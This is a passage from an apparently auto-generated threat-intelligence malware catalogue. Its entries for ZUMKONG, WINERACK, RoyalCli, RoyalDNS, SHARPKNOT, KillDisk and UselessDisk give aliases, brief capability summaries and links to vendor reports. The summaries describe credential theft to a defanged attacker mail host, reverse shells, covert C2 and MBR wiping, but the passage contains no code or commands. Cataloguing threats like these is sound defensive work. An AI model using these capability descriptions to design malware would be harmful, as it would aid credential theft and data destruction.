<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zumkong"><a class="anchor" href="#_zumkong"></a><a class="link" href="#_zumkong">ZUMKONG</a></h3>
<div class="paragraph">
<p>ZUMKONG is a credential stealer capable of harvesting usernames and passwords stored by Internet Explorer and Chrome browsers. Stolen credentials are emailed to the attacker via HTTP POST requests to mail[.]zmail[.]ru.</p>
</div>
<div class="paragraph">
<p>ZUMKONG is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_Trojan_Zumkong</p>
</li>
<li>
<p>Trojan.APT.Zumkong</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2825. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winerack"><a class="anchor" href="#_winerack"></a><a class="link" href="#_winerack">WINERACK</a></h3>
<div class="paragraph">
<p>WINERACK is backdoor whose primary features include user and host information gathering, process creation and termination, filesystem and registry manipulation, as well as the creation of a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands. Other capabilities include the enumeration of files, directories, services, active windows and processes.</p>
</div>
<div class="paragraph">
<p>WINERACK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_Backdoor_WINERACK</p>
</li>
<li>
<p>Backdoor.APT.WINERACK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2826. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_royalcli"><a class="anchor" href="#_royalcli"></a><a class="link" href="#_royalcli">RoyalCli</a></h3>
<div class="paragraph">
<p>The RoyalCli backdoor appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary: 'c:\users\wizard\documents\visual studio 2010\Projects\RoyalCli\Release\RoyalCli.pdb' RoyalCli and BS2005 both communicate with the attacker&#8217;s command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2. Due to the nature of the technique, this results in C2 data being cached to disk by the IE process; we&#8217;ll get to this later.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2827. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/">https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_royaldns"><a class="anchor" href="#_royaldns"></a><a class="link" href="#_royaldns">RoyalDNS</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2828. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/">https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sharpknot"><a class="anchor" href="#_sharpknot"></a><a class="link" href="#_sharpknot">SHARPKNOT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2829. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf">https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_killdisk_wiper"><a class="anchor" href="#_killdisk_wiper"></a><a class="link" href="#_killdisk_wiper">KillDisk Wiper</a></h3>
<div class="paragraph">
<p>KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraines energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms. The note accompanying the ransomware versions, like in the case of Petya, was a ruse: Because KillDisk also overwrites and deletes files (and dont store the encryption keys on disk or online), recovering the scrambled files was out of the question. The new variant we found, however, does not include a ransom note.</p>
</div>
<div class="paragraph">
<p>KillDisk Wiper is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>KillDisk</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2830. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/">https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uselessdisk"><a class="anchor" href="#_uselessdisk"></a><a class="link" href="#_uselessdisk">UselessDisk</a></h3>
<div class="paragraph">
<p>A new MBR bootlocker called DiskWriter, or UselessDisk, has been discovered that overwrites the MBR of a victim&#8217;s computer and then displays a ransom screen on reboot instead of booting into Windows. This ransom note asks for $300 in bitcoins in order to gain access to Windows again. Might be a wiper.</p>
</div>
<div class="paragraph">
<p>UselessDisk is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DiskWriter</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2831. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-diskwriter-or-uselessdisk-bootlocker-may-be-a-wiper/">https://www.bleepingcomputer.com/news/security/the-diskwriter-or-uselessdisk-bootlocker-may-be-a-wiper/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div id="footer">
<div id="footer-text">
Last updated 2018-04-09 14:15:13 CEST
</div>
</div>
</body>
</html>